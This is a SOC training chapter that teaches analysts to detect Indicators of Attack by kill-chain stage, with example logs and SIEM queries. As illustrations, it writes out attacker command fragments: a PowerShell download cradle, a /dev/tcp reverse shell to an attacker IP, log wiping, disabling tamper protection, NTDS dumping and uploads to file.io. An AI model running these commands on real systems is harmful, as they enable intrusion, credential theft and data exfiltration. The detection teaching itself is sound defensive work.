Indicators of Attack (IOAs)

Indicators of Attack focus on attacker intent and behavior, not on static values like IPs or hashes.
IOAs detect what the attacker is doing, instead of what the attacker left behind.
This makes IOAs far more powerful and future-proof than IOCs, because attackers can easily change domains, IPs, filenames, and hashes — but their behavior almost always remains the same.

This chapter explains IOAs in full-scale, ultra-practical SOC depth, with real attacker behavior patterns, log examples, SIEM detections, and investigation workflows.

---

What IOAs Actually Are

IOAs identify malicious actions, patterns, and techniques, such as:

• Credential brute force

• Privilege escalation

• Lateral movement

• Persistence creation

• Process injection

• Script execution

• Data staging and exfiltration

• Unauthorized application execution

IOAs answer the question:

“What malicious activity is happening right now?”

Unlike IOCs, IOAs do not rely on known signatures.

---

Why IOAs Are More Powerful Than IOCs

IOCs fail when:

• Attackers change infrastructure

• Malware hash mutates

• Domain rotates

• IP list becomes outdated

IOAs detect:

• Technique, not artifact

• Intent, not signature

• Behavior, not static data

This allows SOC to detect:

• Zero-day attacks

• Fileless malware

• Polymorphic malware

• New C2 infrastructure

• Unknown threat actors

---

Core IOA Categories (Practical SOC Breakdown)

Below are the behaviors SOC analysts monitor in logs.

---

1. Initial Access IOAs

Phishing Execution Pattern

WINWORD.exe → powershell.exe → curl payload

Malicious Office Macro

office application spawning cmd/powershell

Drive-by Download

browser → dropped executable → network beaconing

---

2. Execution IOAs

Encoded PowerShell Execution

powershell.exe -nop -w hidden -enc JAB...

Script execution from suspicious directories

/tmp/x.sh
/var/tmp/backdoor.py
C:\Users\Public\script.vbs

Fileless attacks

IEX (New-Object Net.WebClient).DownloadString(...)

---

3. Persistence IOAs

New/Modified Startup Items

HKCU\...\Run\backdoor
/etc/crontab added
systemd service created

Malicious Scheduled Tasks

schtasks /create /tn "Updater" /tr "malware.exe"

Cron Persistence

CRON: (root) CMD (/tmp/bd.sh)

---

4. Privilege Escalation IOAs

Sudo Abuse

sudo: mayur : COMMAND=/bin/bash

UID/GID Manipulation

setuid root on unknown binary

Kernel exploit attempt

segfault in privileged process

Admin Token Abuse

4672 - Special Privileges Assigned

---

5. Defense Evasion IOAs

Clearing Logs

> /var/log/auth.log

Disabling Security Services

systemctl stop ufw
reg add ...\TamperProtection = 0

Obfuscation

powershell.exe with base64 or obfuscated variables

---

6. Credential Access IOAs

LSASS Access

proc accessing lsass.exe memory

Keylogging Patterns

raw input hooks installed

Dumping SAM/NTDS

ntdsutil "ac i ntds" "ifm" ...

---

7. Discovery/Recon IOAs

Enumerating users/domains

Get-ADUser -Filter *

Network scanning

nmap 10.0.0.0/24

SMB enumeration

smbclient -L //<target>

---

8. Lateral Movement IOAs

SMB/PSExec Lateral Movement

4624 Logon Type 3 + admin + unusual host

WinRM Lateral Movement

powershell Invoke-Command -ComputerName server01

SSH Pivoting (Linux)

Accepted publickey for root from 10.0.0.25

---

9. Collection IOAs

Data Staging

zip -r data.zip /home/

Sensitive file access

/etc/shadow read by non-root

Database dumps

mysqldump -u root -p*

---

10. Exfiltration IOAs

Large outbound POST requests

POST https://file.io/upload SIZE_OUT=6MB

DNS tunneling

TXT queries with long encoded strings

Reverse shells

/dev/tcp/<attacker-ip>/4444

---

Real IOA Examples from Logs

Windows (Sysmon)

EventID=1: WINWORD.exe → powershell.exe
EventID=3: powershell.exe connection to 91.22.113.10
EventID=10: powershell.exe attempted LSASS read

Linux

CRON: (root) CMD (/tmp/bd.py)
sshd: Accepted password for root from 185.*
python backdoor executing in /tmp

Network Logs

DNS NXDOMAIN storms
C2 domain beaconing at regular intervals
High-volume POST uploads

---

IOA vs IOC (Practical Example)

IOC Example:

Hash: F23A...03 (beacon.exe)

This becomes useless when attacker changes hash.

IOA Example:

powershell.exe -enc base64
network beacon every 60 seconds
logon type 10 from foreign IP

These patterns cannot be changed easily.

---

How SOC Detects IOAs in SIEM

Behavioral Rules

parent_process = WINWORD.exe AND process = powershell.exe

Multi-step correlation alerts

powershell.exe → outbound to malicious country

Frequency-based rules

DNS queries every 60 seconds

Sequence detections

failed logins >10 → successful login → sudo

---

SIEM Queries for IOA Detection

Detect PowerShell abuse

process_name:powershell AND (CommandLine:*enc* OR CommandLine:*nop*)

Detect privilege escalation

sudo AND COMMAND=/bin/bash

Detect lateral movement

4624 AND logon_type:3 AND admin_account AND unusual_host

Detect exfiltration

POST AND bytes_out > 1,000,000

Detect DNS tunneling

query_length > 100 AND query_type:TXT

---

Full Attack Timeline Using IOAs

1 — Initial Access

User opens malicious doc:

WINWORD.exe → powershell.exe

2 — Execution

powershell.exe -enc JAB...

3 — Persistence

HKCU\Run\backdoor

4 — Privilege Escalation

sudo: user : COMMAND=/bin/bash

5 — Lateral Movement

4624 Logon Type 3 from infected host

6 — Collection

zip -r /tmp/data.zip /home

7 — Exfiltration

POST https://transfer.sh/upload SIZE_OUT=4MB

IOAs expose ALL malicious behavior in the kill chain.

---

Analyst Workflow Using IOAs

1. Identify suspicious behavior (not just static values)

2. Determine attack stage (initial access, lateral movement, etc.)

3. Correlate logs across endpoints + network

4. Validate if behavior matches known MITRE ATT&CK techniques

5. Check for repetition or automation

6. Search for related suspicious activity

7. Build timeline

8. Confirm malicious intent

9. Escalate incident

10. Create new detections based on observed IOAs

This workflow is how SOC analysts detect new, unknown, or zero-day threats.

---

Intel Dump

• IOAs detect attacker behavior, not static values.

• IOAs include execution patterns, privilege escalation, lateral movement, persistence, C2 behavior, and exfiltration.

• IOAs are harder for attackers to evade than IOCs.

• IOAs allow detection of fileless malware, zero-days, and polymorphic malware.

• SIEM rules use process sequences, frequency patterns, parent-child chains, and network anomalies.

• IOA-based detection outlines entire kill chains from execution → persistence → credential access → movement → exfiltration.